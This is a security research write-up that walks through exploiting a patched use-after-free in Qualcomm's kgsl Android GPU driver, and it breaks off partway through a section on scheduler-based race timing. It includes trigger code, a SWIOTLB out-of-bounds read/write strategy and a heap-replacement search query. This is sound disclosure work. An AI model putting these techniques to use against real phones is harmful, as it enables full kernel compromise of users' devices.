In this series of posts, I’ll exploit three bugs that I reported last year: a use-after-free in the renderer of Chrome, a Chromium sandbox escape that was reported and fixed while it was still in beta, and a use-after-free in the Qualcomm msm kernel. Together, these three bugs form an exploit chain that allows remote kernel code execution by visiting a malicious website in the beta version of Chrome. While the full chain itself only affects the beta version of Chrome, both the renderer RCE and the kernel code execution existed in stable versions of the respective software. All of these bugs had been patched for quite some time, with the last one patched on the first of January.
Vulnerabilities used in the series
The three vulnerabilities that I’m going to use are the following. To achieve arbitrary kernel code execution from a compromised beta version of Chrome, I’ll use CVE-2020-11239, a use-after-free in the kgsl driver in the Qualcomm msm kernel. This vulnerability was reported to the Android security team in July 2020 as A-161544755 (GHSL-2020-375) and was patched in the January Bulletin. In the security bulletin, this bug was mistakenly associated with A-168722551, although the Android security team has since confirmed that they will acknowledge me as the original reporter of the issue. (However, the acknowledgement page had not been updated to reflect this at the time of writing.) For compromising Chrome, I’ll use CVE-2020-15972, a use-after-free in web audio, to trigger a renderer RCE. This is a duplicate of a bug that an anonymous researcher reported about three weeks before I reported it as 1125635 (GHSL-2020-167). To escape the Chrome sandbox and gain control of the browser process, I’ll use CVE-2020-16045, which was reported as 1125614 (GHSL-2020-165). While the exploit uses a component that was only enabled in the beta version of Chrome, the bug would probably have made it into the stable version and been exploitable had it not been reported. Interestingly, the renderer bug CVE-2020-15972 was fixed in version 86.0.4240.75, the same version in which the sandbox escape bug would have made it into the stable version of Chrome (had it not been reported), so these two bugs literally missed each other by one day to form a full chain against stable Chrome.
Qualcomm kernel vulnerability
The vulnerability used in this post is a use-after-free in the kernel graphics support layer (kgsl) driver. This driver provides an interface for userland apps to communicate with the Adreno gpu (the gpu used on Qualcomm’s Snapdragon chipsets). As apps need to access this driver to render themselves, it is one of the few drivers that can be reached from third-party applications on all phones that use Qualcomm chipsets. The vulnerability itself can be triggered on all such phones running kernel version 4.14 or above, which should be the case for many mid to high end phones released after late 2019, for example the Pixel 4, Samsung Galaxy S10, S20, and A71. The exploit in this post, however, could not be launched directly from a third-party app on the Pixel 4 due to further SELinux restrictions, but it can be launched from third-party apps on Samsung phones and possibly some others as well. The exploit was largely developed on a Pixel 4 running AOSP built from source and then adapted to a Samsung Galaxy A71. With some adjustment of parameters, it should probably also work on flagship models like the Samsung Galaxy S10 and S20 (Snapdragon versions), although I don’t have those phones and have not tried it out myself.
The vulnerability here concerns the ioctl calls that create shared memory objects between user applications and the gpu, such as IOCTL_KGSL_GPUOBJ_IMPORT and IOCTL_KGSL_MAP_USER_MEM.
When using these calls, the caller specifies a user space address in their process, the size of the shared memory, as well as the type of memory object to create. After a successful ioctl call, the kgsl driver maps the user supplied memory into the gpu’s address space so that the gpu can access it. Depending on the type of memory specified in the ioctl call parameters, different mechanisms are used by the kernel to map and access the user space memory.
The two different types of memory are KGSL_USER_MEM_TYPE_ADDR, which is ordinary memory in the user process’s address space, and KGSL_USER_MEM_TYPE_ION (which the code treats as the same as KGSL_USER_MEM_TYPE_DMABUF), a DMA buffer allocated via the ion allocator:
long kgsl_ioctl_gpuobj_import(struct kgsl_device_private *dev_priv,
unsigned int cmd, void *data)
{
...
entry = kgsl_mem_entry_create();
...
if (param->type == KGSL_USER_MEM_TYPE_ADDR)
ret = _gpuobj_map_useraddr(dev_priv->device, private->pagetable,
entry, param);
//KGSL_USER_MEM_TYPE_ION is translated to KGSL_USER_MEM_TYPE_DMABUF
else if (param->type == KGSL_USER_MEM_TYPE_DMABUF)
ret = _gpuobj_map_dma_buf(dev_priv->device, private->pagetable,
entry, param, &fd);
else
ret = -ENOTSUPP;
In particular, when creating a memory object from a DMA buffer (the KGSL_USER_MEM_TYPE_ION type), the standard DMA buffer sharing mechanism is used, which works roughly as follows:
- The user creates a DMA buffer using the ion allocator. On Android, ion is the concrete implementation of DMA buffers, so sometimes the terms are used interchangeably, as in the kgsl code here, in which KGSL_USER_MEM_TYPE_DMABUF and KGSL_USER_MEM_TYPE_ION refer to the same thing.
- The ion allocator will then allocate memory from the ion heap, which is a special region of memory separated from the heap used by the kmalloc family of calls. I’ll cover more about the ion heap later in the post.
- The ion allocator will return a file descriptor to the user, which is used as a handle to the DMA buffer.
- The user can then pass this file descriptor to the device via an appropriate ioctl call.
- The device then obtains the DMA buffer from the file descriptor via dma_buf_get and uses dma_buf_attach to attach it to itself.
- The device uses dma_buf_map_attachment to obtain the sg_table of the DMA buffer, which contains the locations and sizes of the backing stores of the DMA buffer. It can then use it to access the buffer.
- After this, both the device and the user can access the DMA buffer. This means that the buffer can now be modified by both the cpu (by the user) and the device, so care must be taken to synchronize the cpu view of the buffer and the device view of the buffer. (For example, the cpu may cache the content of the DMA buffer and then the device modifies its content, resulting in stale data in the cpu (user) view.) To do this, the user can use the DMA_BUF_IOCTL_SYNC call of the DMA buffer to synchronize the different views of the buffer before and after accessing it. (A minimal sketch of this is given right after this list.)
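As a concrete illustration of the last two steps, here is a minimal user space sketch that writes to a shared DMA buffer. It assumes dma_fd is the file descriptor of an already allocated DMA buffer (for example one returned by the ion allocator), uses only the standard dma-buf UAPI from linux/dma-buf.h, and omits error handling:

#include <stdint.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <linux/dma-buf.h>

/* dma_fd: file descriptor of a DMA buffer that is shared with a device. */
static void write_to_dma_buf(int dma_fd, size_t size, const char *msg)
{
    /* Map the DMA buffer to get the cpu (user) view of it. */
    char *buf = mmap(NULL, size, PROT_READ | PROT_WRITE, MAP_SHARED, dma_fd, 0);

    /* Tell the kernel that the cpu is about to access the buffer... */
    struct dma_buf_sync sync = { .flags = DMA_BUF_SYNC_START | DMA_BUF_SYNC_RW };
    ioctl(dma_fd, DMA_BUF_IOCTL_SYNC, &sync);

    memcpy(buf, msg, strlen(msg) + 1);

    /* ...and that the cpu access is finished, so the views can be synchronized. */
    sync.flags = DMA_BUF_SYNC_END | DMA_BUF_SYNC_RW;
    ioctl(dma_fd, DMA_BUF_IOCTL_SYNC, &sync);

    munmap(buf, size);
}

The kernel side of this DMA_BUF_IOCTL_SYNC ioctl is exactly the code path that will become interesting later in the post.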
When the device is done with the shared buffer, it is important to call the functions dma_buf_unmap_attachment, dma_buf_detach and dma_buf_put to perform the appropriate clean up.
In the case of sharing a DMA buffer with the kgsl driver, the sg_table obtained from dma_buf_map_attachment, which is owned by the DMA buffer, is stored both in the private data and in the memdesc of the kgsl_mem_entry that represents the memory object:
static int kgsl_setup_dma_buf(struct kgsl_device *device,
struct kgsl_pagetable *pagetable,
struct kgsl_mem_entry *entry,
struct dma_buf *dmabuf)
{
...
sg_table = dma_buf_map_attachment(attach, DMA_TO_DEVICE);
...
meta->table = sg_table;
entry->priv_data = meta;
entry->memdesc.sgt = sg_table;
On the other hand, in the case of a KGSL_USER_MEM_TYPE_ADDR object, the kgsl driver creates its own sg_table for the user memory and stores it in memdesc->sgt:
static int memdesc_sg_virt(struct kgsl_memdesc *memdesc, struct file *vmfile)
{
...
//Creates an sg_table and stores it in memdesc->sgt
ret = sg_alloc_table_from_pages(memdesc->sgt, pages, npages,
0, memdesc->size, GFP_KERNEL);
As such, care must be taken with the ownership of the sg_table stored in memdesc->sgt: for an ION type object it belongs to the DMA buffer, while for an ADDR type object it belongs to the kgsl_mem_entry itself. This is reflected in the clean up code that runs when something goes wrong in kgsl_ioctl_gpuobj_import:
unmap:
if (param->type == KGSL_USER_MEM_TYPE_DMABUF) {
kgsl_destroy_ion(entry->priv_data);
entry->memdesc.sgt = NULL;
}
kgsl_sharedmem_free(&entry->memdesc);
If we created an ION type memory object, then apart from the extra clean up in kgsl_destroy_ion that detaches the gpu from the DMA buffer, entry->memdesc.sgt is also set to NULL, so that the subsequent kgsl_sharedmem_free will not free the sg_table that belongs to the DMA buffer:
void kgsl_sharedmem_free(struct kgsl_memdesc *memdesc)
{
...
if (memdesc->sgt) {
sg_free_table(memdesc->sgt);
kfree(memdesc->sgt);
}
if (memdesc->pages)
kgsl_free(memdesc->pages);
}
So far, so good, everything is taken care of, but a closer look reveals that, when creating a KGSL_USER_MEM_TYPE_ADDR object, the driver will first try to interpret the user supplied address as a DMA buffer:
static int kgsl_setup_useraddr(struct kgsl_device *device,
struct kgsl_pagetable *pagetable,
struct kgsl_mem_entry *entry,
unsigned long hostptr, size_t offset, size_t size)
{
...
/* Try to set up a dmabuf - if it returns -ENODEV assume anonymous */
ret = kgsl_setup_dmabuf_useraddr(device, pagetable, entry, hostptr);
if (ret != -ENODEV)
return ret;
/* Okay - lets go legacy */
return kgsl_setup_anon_useraddr(pagetable, entry,
hostptr, offset, size);
}
While there is nothing wrong with using a DMA mapping when the user supplied memory is actually a dma buffer (allocated by ion), if something goes wrong during the ioctl call, the clean up logic will be wrong: because the memory object was created with type KGSL_USER_MEM_TYPE_ADDR, kgsl_sharedmem_free will free entry->memdesc.sgt, even though in this case it is owned by the DMA buffer attachment. To see what this sg_table is, note that when a DMA buffer is attached to a device, the ion implementation of dma_buf_attach duplicates the buffer’s sg_table and stores it in the attachment:
static int ion_dma_buf_attach(struct dma_buf *dmabuf, struct device *dev,
struct dma_buf_attachment *attachment)
{
...
table = dup_sg_table(buffer->sg_table);
...
a->table = table; //<---- c. duplicated table stored in attachment, which is the output of dma_buf_attach in a.
...
mutex_lock(&buffer->lock);
list_add(&a->list, &buffer->attachments); //<---- d. attachment got added to dma_buf::attachments
mutex_unlock(&buffer->lock);
return 0;
}
This will normally be removed when the DMA buffer is detached from the device. However, because of the wrong clean up logic, the DMA buffer will never be detached in this case (kgsl_destroy_ion is not called), while the duplicated sg_table stored in the attachment has already been freed by kgsl_sharedmem_free. The attachment, with its dangling table pointer, remains in the attachments list of the DMA buffer and will be used again, for example, when a DMA_BUF_IOCTL_SYNC call is made on the buffer:
static int __ion_dma_buf_begin_cpu_access(struct dma_buf *dmabuf,
enum dma_data_direction direction,
bool sync_only_mapped)
{
...
list_for_each_entry(a, &buffer->attachments, list) {
...
if (sync_only_mapped)
tmp = ion_sgl_sync_mapped(a->dev, a->table->sgl, //<--- use-after-free of a->table
a->table->nents,
&buffer->vmas,
direction, true);
else
dma_sync_sg_for_cpu(a->dev, a->table->sgl, //<--- use-after-free of a->table
a->table->nents, direction);
...
}
}
...
}
There are actually multiple paths in this ioctl that can lead to the use of the free’d sg_table in different ways.
Getting a free’d object with a fake out-of-memory error
While this looks like a very good use-after-free that allows me to hold onto a free’d object and use it at any convenient time, as well as in different ways, to trigger it, I first need to cause the IOCTL_KGSL_GPUOBJ_IMPORT call to fail after the DMA buffer has been attached and mapped, so that the faulty clean up code runs. Let’s look at where the call can fail:
long kgsl_ioctl_gpuobj_import(struct kgsl_device_private *dev_priv,
unsigned int cmd, void *data)
{
...
kgsl_memdesc_init(dev_priv->device, &entry->memdesc, param->flags);
if (param->type == KGSL_USER_MEM_TYPE_ADDR)
ret = _gpuobj_map_useraddr(dev_priv->device, private->pagetable,
entry, param);
else if (param->type == KGSL_USER_MEM_TYPE_DMABUF)
ret = _gpuobj_map_dma_buf(dev_priv->device, private->pagetable,
entry, param, &fd);
else
ret = -ENOTSUPP;
if (ret)
goto out;
...
ret = kgsl_mem_entry_attach_process(dev_priv->device, private, entry);
if (ret)
goto unmap;
This is the last point where the call can fail. Any earlier failure will also not result in the problematic unmap clean up path being taken (those failures jump to out instead). So the goal is to make kgsl_mem_entry_attach_process fail:
static int kgsl_mem_entry_attach_process(struct kgsl_device *device,
struct kgsl_process_private *process,
struct kgsl_mem_entry *entry)
{
...
ret = kgsl_mem_entry_track_gpuaddr(device, process, entry);
if (ret) {
kgsl_process_private_put(process);
return ret;
}
Of course, to actually cause an out-of-memory error would be rather difficult and unreliable, as well as risking crashing the device by exhausting its memory.
If we look at how a user provided address is mapped to a gpu address in kgsl_iommu_get_gpuaddr, which is reached from kgsl_mem_entry_track_gpuaddr above, we see that the flags of the memdesc are used to compute an alignment parameter:
static int kgsl_iommu_get_gpuaddr(struct kgsl_pagetable *pagetable,
struct kgsl_memdesc *memdesc)
{
...
unsigned int align;
...
//Uses `memdesc->flags` to compute the alignment parameter
align = max_t(uint64_t, 1 << kgsl_memdesc_get_align(memdesc),
memdesc->pad_to);
...
and the flags of the memdesc are simply taken from the user supplied param->flags when the memdesc is initialized in kgsl_ioctl_gpuobj_import:
long kgsl_ioctl_gpuobj_import(struct kgsl_device_private *dev_priv,
unsigned int cmd, void *data)
{
...
kgsl_memdesc_init(dev_priv->device, &entry->memdesc, param->flags);
When mapping memory to the gpu, this align parameter is used when searching for a suitable gpu address range. By specifying an excessively large alignment in the user supplied flags, I can make kgsl_iommu_get_gpuaddr fail to find a gpu address, so kgsl_mem_entry_attach_process returns an error and the faulty clean up runs, leaving me with a free’d sg_table without having to exhaust the memory.
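The following sketch shows roughly what the failing import looks like from user space. It is only meant to illustrate the shape of the call: the struct layout and constants are taken from my reading of the msm_kgsl.h UAPI header and should be verified against the target kernel, and the alignment value is a placeholder (the value that fails reliably can be found in the full exploit). Here kgsl_fd is an open file descriptor of /dev/kgsl-3d0 and dma_fd is an ion allocated DMA buffer:

#include <stdint.h>
#include <stddef.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <linux/msm_kgsl.h>   /* UAPI header from the target kernel tree (assumed available) */

static int trigger_faulty_cleanup(int kgsl_fd, int dma_fd, size_t size)
{
    /* Back a plain user space address with the DMA buffer. */
    void *host = mmap(NULL, size, PROT_READ | PROT_WRITE, MAP_SHARED, dma_fd, 0);

    struct kgsl_gpuobj_import import = {0};
    /* For KGSL_USER_MEM_TYPE_ADDR the user address goes through priv. (On some kernel
     * versions priv may instead point to a struct kgsl_gpuobj_import_useraddr holding
     * the address -- check msm_kgsl.h on the target.) */
    import.priv = (uint64_t)(uintptr_t)host;
    import.priv_len = size;
    import.type = KGSL_USER_MEM_TYPE_ADDR;   /* ADDR type, although the memory is a DMA buffer */
    /* Request an absurdly large alignment so that no suitable gpu address range is found,
     * kgsl_mem_entry_attach_process fails, and the faulty unmap clean up path frees the
     * sg_table that belongs to the DMA buffer attachment. */
    import.flags = 63ULL << KGSL_MEMALIGN_SHIFT;

    /* Expected to fail; the interesting part is the free'd sg_table left behind. */
    return ioctl(kgsl_fd, IOCTL_KGSL_GPUOBJ_IMPORT, &import);
}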
The primitives of the vulnerability
As mentioned before, there are different ways to use the free’d sg_table. The most direct one is the DMA_BUF_IOCTL_SYNC ioctl of the DMA buffer:
static long dma_buf_ioctl(struct file *file,
unsigned int cmd, unsigned long arg)
{
...
switch (cmd) {
case DMA_BUF_IOCTL_SYNC:
...
if (sync.flags & DMA_BUF_SYNC_END)
if (sync.flags & DMA_BUF_SYNC_USER_MAPPED)
ret = dma_buf_end_cpu_access_umapped(dmabuf,
dir);
else
ret = dma_buf_end_cpu_access(dmabuf, dir);
else
if (sync.flags & DMA_BUF_SYNC_USER_MAPPED)
ret = dma_buf_begin_cpu_access_umapped(dmabuf,
dir);
else
ret = dma_buf_begin_cpu_access(dmabuf, dir);
return ret;
These will end up calling __ion_dma_buf_begin_cpu_access or __ion_dma_buf_end_cpu_access in the ion driver, which iterate through the attachments of the DMA buffer and use the free’d sg_table, as shown earlier.
As explained before, the free’d sg_table is used to synchronize the cpu and device views of the buffer. Roughly speaking, the following happens:
- The scatterlist in the free’d sg_table is iterated in a loop;
- In each iteration, the dma_address and dma_length of the scatterlist are used to identify the location and size of the memory for synchronization.
- The function swiotlb_sync_single is called to perform the actual synchronization of the memory.
So what does swiotlb_sync_single do?
static void
swiotlb_sync_single(struct device *hwdev, dma_addr_t dev_addr,
size_t size, enum dma_data_direction dir,
enum dma_sync_target target)
{
phys_addr_t paddr = dma_to_phys(hwdev, dev_addr);
BUG_ON(dir == DMA_NONE);
if (is_swiotlb_buffer(paddr)) {
swiotlb_tbl_sync_single(hwdev, paddr, size, dir, target);
return;
}
if (dir != DMA_FROM_DEVICE)
return;
dma_mark_clean(phys_to_virt(paddr), size);
}
The function swiotlb_tbl_sync_single, which is reached when paddr lies within the SWIOTLB, then looks up the original address associated with this SWIOTLB slot:
void swiotlb_tbl_sync_single(struct device *hwdev, phys_addr_t tlb_addr,
size_t size, enum dma_data_direction dir,
enum dma_sync_target target)
{
int index = (tlb_addr - io_tlb_start) >> IO_TLB_SHIFT;
phys_addr_t orig_addr = io_tlb_orig_addr[index];
if (orig_addr == INVALID_PHYS_ADDR) //<--------- a. checks address valid
return;
orig_addr += (unsigned long)tlb_addr & ((1 << IO_TLB_SHIFT) - 1);
switch (target) {
case SYNC_FOR_CPU:
if (likely(dir == DMA_FROM_DEVICE || dir == DMA_BIDIRECTIONAL))
swiotlb_bounce(orig_addr, tlb_addr,
size, DMA_FROM_DEVICE);
...
}
After a further check of the address (a. in the above), swiotlb_bounce is called to do the actual copying:
static void swiotlb_bounce(phys_addr_t orig_addr, phys_addr_t tlb_addr,
size_t size, enum dma_data_direction dir)
{
...
unsigned char *vaddr = phys_to_virt(tlb_addr);
if (PageHighMem(pfn_to_page(pfn))) {
...
while (size) {
sz = min_t(size_t, PAGE_SIZE - offset, size);
local_irq_save(flags);
buffer = kmap_atomic(pfn_to_page(pfn));
if (dir == DMA_TO_DEVICE)
memcpy(vaddr, buffer + offset, sz);
else
memcpy(buffer + offset, vaddr, sz);
...
}
} else if (dir == DMA_TO_DEVICE) {
memcpy(vaddr, phys_to_virt(orig_addr), size);
} else {
memcpy(phys_to_virt(orig_addr), vaddr, size);
}
}
As both tlb_addr and size here ultimately come from the dma_address and dma_length of the free’d sg_table, this looks like a very powerful primitive, but a few questions need to be answered first:
- What is the swiotlb_buffer and is it possible to pass the is_swiotlb_buffer check without a separate info leak?
- What is the io_tlb_orig_addr and how to pass that test?
- How much control do I have with the orig_addr, which comes from io_tlb_orig_addr?
The Software Input Output Translation Lookaside Buffer
The Software Input Output Translation Lookaside Buffer (SWIOTLB), sometimes known as the bounce buffer, is a memory region with physical address smaller than 32 bits. It seems to be very rarely used in modern Android phones and as far as I can gather, there are two main uses of it:
- It is used when a DMA buffer that has a physical address higher than 32 bits is attached to a device that can only access 32 bit addresses. In this case, the SWIOTLB is used as a proxy of the DMA buffer so that the device can access it. This is the code path that we have been looking at. As this means an extra read/write operation between the DMA buffer and the SWIOTLB every time a synchronization between the device and DMA buffer happens, it is not an ideal scenario and is only used as a last resort.
- It is used as a layer of protection to prevent untrusted usb devices from accessing DMA memory directly (see here).
As the second usage likely involves plugging a usb device into the phone and thus requires physical access, I’ll only cover the first usage here, which will also answer the three questions in the previous section.
To begin with, let’s take a look at the location of the SWIOTLB. This is what the check is_swiotlb_buffer tests against:
int is_swiotlb_buffer(phys_addr_t paddr)
{
return paddr >= io_tlb_start && paddr < io_tlb_end;
}
The global variables io_tlb_start and io_tlb_end mark the boundaries of the SWIOTLB. They are set when the SWIOTLB is allocated very early during boot, and the location is also printed in the kernel log:
...
[ 0.000000] c0 0 software IO TLB: swiotlb init: 00000000f3800000
[ 0.000000] c0 0 software IO TLB: mapped [mem 0xf3800000-0xf3c00000] (4MB)
...
Here we see that the SWIOTLB is allocated at the fixed physical address 0xf3800000 with a size of 4MB, well below the 32 bit limit.
While allocating the SWIOTLB early makes sure that its address is below 32 bits, it also makes it predictable. In fact, the address only seems to depend on the amount of memory configured for the SWIOTLB, which is passed via the swiotlb parameter in the kernel command line. For example, configuring a minimal SWIOTLB gives:
[ 0.000000] software IO TLB: mapped [mem 0xfffbf000-0xfffff000] (0MB)
The SWIOTLB will be at the same location across reboots, as long as the amount of memory configured for it stays the same.
This provides us with a predictable location for the SWIOTLB to pass the is_swiotlb_buffer check.
Let’s now take a look at how io_tlb_orig_addr gets filled in. When a DMA buffer is mapped for a device that cannot access its address, swiotlb_map_sg_attrs sets up the SWIOTLB mapping:
int
swiotlb_map_sg_attrs(struct device *hwdev, struct scatterlist *sgl, int nelems,
enum dma_data_direction dir, unsigned long attrs)
{
...
for_each_sg(sgl, sg, nelems, i) {
phys_addr_t paddr = sg_phys(sg);
dma_addr_t dev_addr = phys_to_dma(hwdev, paddr);
if (swiotlb_force == SWIOTLB_FORCE ||
!dma_capable(hwdev, dev_addr, sg->length)) {
//device cannot access dev_addr, so use SWIOTLB as a proxy
phys_addr_t map = map_single(hwdev, sg_phys(sg),
sg->length, dir, attrs);
...
}
In this case, map_single allocates a slot in the SWIOTLB to act as a proxy of the DMA buffer and records the original physical address of the buffer in io_tlb_orig_addr. So for a legitimate SWIOTLB mapping, the orig_addr used by swiotlb_bounce is simply the address of the DMA buffer that the SWIOTLB slot is proxying:
static void swiotlb_bounce(phys_addr_t orig_addr, phys_addr_t tlb_addr,
size_t size, enum dma_data_direction dir)
{
...
//orig_addr is the address of a DMA buffer that uses the SWIOTLB mapping
} else if (dir == DMA_TO_DEVICE) {
memcpy(vaddr, phys_to_virt(orig_addr), size);
} else {
memcpy(phys_to_virt(orig_addr), vaddr, size);
}
}
It now becomes clear that, if I can allocate a SWIOTLB, then I will be able to perform both read and write of a region behind the SWIOTLB region with arbitrary size (and completely controlled content in the case of write). In what follows, this is what I’m going to use for the exploit.
To summarize, this is how synchronization works for a DMA buffer shared with a device, with the ion implementation of the dma-buf operations.
When the device is capable of accessing the DMA buffer’s address, synchronization will involve flushing the cpu cache:

When the device cannot access the DMA buffer directly, a SWIOTLB is created as an intermediate buffer to allow device access. In this case, the content of the DMA buffer is copied to and from the SWIOTLB during synchronization:

In the use-after-free scenario, I can control the size of this copy, as well as the location within the SWIOTLB, via the dma_length and dma_address of the free’d sg_table:

Provided I can control the scatterlist of the free’d sg_table, this gives me out-of-bounds read and write primitives around both the SWIOTLB and the DMA buffer that it is proxying.
Allocating a Software Input Output Translation Lookaside Buffer
As it turns out, the SWIOTLB is actually very rarely used. For one reason or another, either because most devices are capable of accessing 64 bit addresses or because the DMA buffer synchronization goes through a different implementation, the only place I found where SWIOTLB buffers can be allocated from an untrusted app is the adsprpc driver, which is used to communicate with the DSP (digital signal processor).
Roughly speaking, the DSP is a specialized chip that is optimized for certain computationally intensive tasks such as image, video, audio processing and machine learning. The cpu can offload these tasks to the DSP to improve overall performance. However, as the DSP is a different processor altogether, an RPC mechanism is needed to pass data and instructions between the cpu and the DSP. This is what the adsprpc driver provides.
While access to the adsprpc driver is blocked by SELinux for untrusted apps on some devices such as the Pixel 4 (this is the SELinux restriction mentioned at the beginning of the post), it is reachable from third-party apps on Samsung phones.
With the adsprpc driver, a DMA buffer is attached and mapped to the DSP via fastrpc_mmap_create. One path that takes a user supplied DMA buffer file descriptor is the FASTRPC_DMAHANDLE_NOMAP case:
static int fastrpc_mmap_create(struct fastrpc_file *fl, int fd,
unsigned int attr, uintptr_t va, size_t len, int mflags,
struct fastrpc_mmap **ppmap)
{
...
} else if (mflags == FASTRPC_DMAHANDLE_NOMAP) {
VERIFY(err, !IS_ERR_OR_NULL(map->buf = dma_buf_get(fd)));
if (err)
goto bail;
VERIFY(err, !dma_buf_get_flags(map->buf, &flags));
...
map->attach->dma_map_attrs |= DMA_ATTR_SKIP_CPU_SYNC;
...
However, the call seems to always fail when I try to reach this path directly.
Another possibility is to use the remote procedure call interface itself. When making a remote invocation, the arguments are prepared in get_args, which will also create mappings for DMA handles that are passed to the DSP:
static int get_args(uint32_t kernel, struct smq_invoke_ctx *ctx)
{
...
for (i = bufs; i < bufs + handles; i++) {
...
if (ctx->attrs && (ctx->attrs[i] & FASTRPC_ATTR_NOMAP))
dmaflags = FASTRPC_DMAHANDLE_NOMAP;
VERIFY(err, !fastrpc_mmap_create(ctx->fl, ctx->fds[i],
FASTRPC_ATTR_NOVA, 0, 0, dmaflags,
&ctx->maps[i]));
...
}
The function get_args is called from fastrpc_internal_invoke, which implements the remote invocation:
static int fastrpc_internal_invoke(struct fastrpc_file *fl, uint32_t mode,
uint32_t kernel,
struct fastrpc_ioctl_invoke_crc *inv)
{
...
if (REMOTE_SCALARS_LENGTH(ctx->sc)) {
PERF(fl->profile, GET_COUNTER(perf_counter, PERF_GETARGS),
VERIFY(err, 0 == get_args(kernel, ctx)); //<----- get_args
PERF_END);
if (err)
goto bail;
}
...
wait:
if (kernel) {
....
} else {
interrupted = wait_for_completion_interruptible(&ctx->work);
VERIFY(err, 0 == (err = interrupted));
if (err)
goto bail; //<----- invocation failed and jump to bail directly
}
...
VERIFY(err, 0 == put_args(kernel, ctx, invoke->pra)); //<------ detach the arguments
PERF_END);
...
bail:
...
return err;
}
So by making a remote invocation that passes my DMA buffer file descriptors as handles with the FASTRPC_ATTR_NOMAP attribute, get_args will attach and map my DMA buffers to the adsprpc device. As this device is not able to access the full 64 bit address range, buffers with high physical addresses are proxied through the SWIOTLB. Moreover, if the invocation fails (for example, when the wait for the remote call is interrupted), the code jumps to bail and put_args, which would detach the arguments, is skipped, so the buffers stay attached and their SWIOTLB slots remain allocated.
Now that I can allocate SWIOTLB that maps to DMA buffers that I created, I can do the following to exploit the out-of-bounds read/write primitive from the previous section.
- First allocate a number of DMA buffers. By manipulating the ion heap (which I’ll go through later in this post), I can place some useful data behind one of these DMA buffers. I will call this buffer DMA_1.
- Use the adsprpc driver to allocate SWIOTLB buffers associated with these DMA buffers. I’ll arrange it so that DMA_1 occupies the first SWIOTLB (which means all other SWIOTLB will be allocated behind it), call this SWIOTLB_1. This can be done easily as SWIOTLB are simply allocated as a contiguous array.
- Use the read/write primitive in the previous section to trigger out-of-bounds read/write on DMA_1. This will either write the memory behind DMA_1 to the SWIOTLB behind SWIOTLB_1, or vice versa.
- As the SWIOTLB behind SWIOTLB_1 are mapped to the other DMA buffers that I controlled, I can use the DMA_BUF_IOCTL_SYNC ioctl of these DMA buffers to either read data from these SWIOTLB or write data to them. This translates into arbitrary read/write of memory behind DMA_1. (A short sketch of this step follows the list.)
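A short sketch of the last step, where dma2_fd stands for the file descriptor of one of the DMA buffers whose SWIOTLB slot lies behind SWIOTLB_1 (the variable names are mine, not an API). Which combination of sync flags moves data in which direction depends on the DMA direction of the mapping, so treat the flags below as illustrative; the full exploit has the working combination:

#include <sys/ioctl.h>
#include <sys/mman.h>
#include <linux/dma-buf.h>

/* Make the data that the out-of-bounds copy placed into the SWIOTLB slot of
 * dma2_fd visible in its cpu view, then return that view. */
static void *read_leaked(int dma2_fd, size_t size)
{
    void *view = mmap(NULL, size, PROT_READ | PROT_WRITE, MAP_SHARED, dma2_fd, 0);

    /* Synchronizing the cpu view copies between the SWIOTLB slot and the buffer,
     * so the bytes leaked from behind DMA_1 show up here. */
    struct dma_buf_sync sync = { .flags = DMA_BUF_SYNC_START | DMA_BUF_SYNC_READ };
    ioctl(dma2_fd, DMA_BUF_IOCTL_SYNC, &sync);

    return view;
}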
The following figure illustrates this with a simplified case of two DMA buffers.

Replacing the sg_table
So far, I planned an exploitation strategy based on the assumption that I already have control of the free’d sg_table. To actually gain that control, I need to find objects of a similar size, allocatable from user space with content I control, that can take the place of the free’d object. To look for suitable candidates, I used the following CodeQL query:
from FunctionCall fc, Type t, Variable v, Field f, Type t2
where (fc.getTarget().hasName("kmalloc") or
fc.getTarget().hasName("kzalloc") or
fc.getTarget().hasName("kcalloc"))
and
exists(Assignment assign | assign.getRValue() = fc and
assign.getLValue() = v.getAnAccess() and
v.getType().(PointerType).refersToDirectly(t)) and
t.getSize() < 128 and t.fromSource() and
f.getDeclaringType() = t and
(f.getType().(PointerType).refersTo(t2) and t2.getSize() <= 8) and
f.getByteOffset() = 0
select fc, t, fc.getLocation()
In this query, I look for objects smaller than 128 bytes that are created via the kmalloc family of calls and whose first field is a pointer, so that it lines up with the sgl pointer at the start of sg_table. One of the results is the filename object allocated in getname_flags:
struct filename *
getname_flags(const char __user *filename, int flags, int *empty)
{
struct filename *result;
...
if (unlikely(len == EMBEDDED_NAME_MAX)) {
...
result = kzalloc(size, GFP_KERNEL);
if (unlikely(!result)) {
__putname(kname);
return ERR_PTR(-ENOMEM);
}
result->name = kname;
len = strncpy_from_user(kname, filename, PATH_MAX);
...
with the first field, name, pointing to kname, a buffer whose content is copied from the user supplied string, which makes struct filename a possible candidate for taking the place of the free’d sg_table.
Just-in-time object replacement
Let’s take a look at how the free’d sg_table is used in __ion_dma_buf_begin_cpu_access:
static int __ion_dma_buf_begin_cpu_access(struct dma_buf *dmabuf,
enum dma_data_direction direction,
bool sync_only_mapped)
{
if (sync_only_mapped)
tmp = ion_sgl_sync_mapped(a->dev, a->table->sgl, //<------- `sgl` got passed, and `table` never used again
a->table->nents,
&buffer->vmas,
direction, true);
else
dma_sync_sg_for_cpu(a->dev, a->table->sgl,
a->table->nents, direction);
While source code could be misleading as auto function inlining is common in kernel code (in fact these ion functions are inlined into their callers), the sgl pointer is read from the free’d sg_table once and cached in a register, after which the sg_table itself is not accessed again. This means that the object pointed to by sgl has to be freed and replaced within the short window after sgl is read but before it is used, which is normally far too narrow to hit reliably.
To resolve this, I’ll use a technique by Jann Horn in Exploiting race conditions on [ancient] Linux, which turns out to still work like a charm on modern Android.
To ensure that each task (thread or process) has a fair share of the cpu time, the linux kernel scheduler can interrupt a running task and put it on hold, so that another task can run. This kind of interruption and stopping of a task is called preemption (and the interrupted task is preempted). A task can also put itself on hold to allow other tasks to run, for example when it is waiting for some I/O input, or when it voluntarily gives up the cpu (e.g. via sched_yield).
To gain better control in both these areas, cpu affinity and task priorities can be used. By default, a task runs with the priority SCHED_NORMAL, but it can be given the lower priority SCHED_IDLE, and it can also be pinned to a specific cpu. By putting a SCHED_NORMAL task and a SCHED_IDLE task on the same cpu, the SCHED_IDLE task can be preempted at a moment of my choosing (a minimal sketch of this set up follows the list):
- First have the SCHED_NORMAL task perform a syscall that would cause it to pause and wait. For example, it can read from a pipe with no data coming in from the other end, then it would wait for more data and voluntarily preempt itself, so that the SCHED_IDLE task can run;
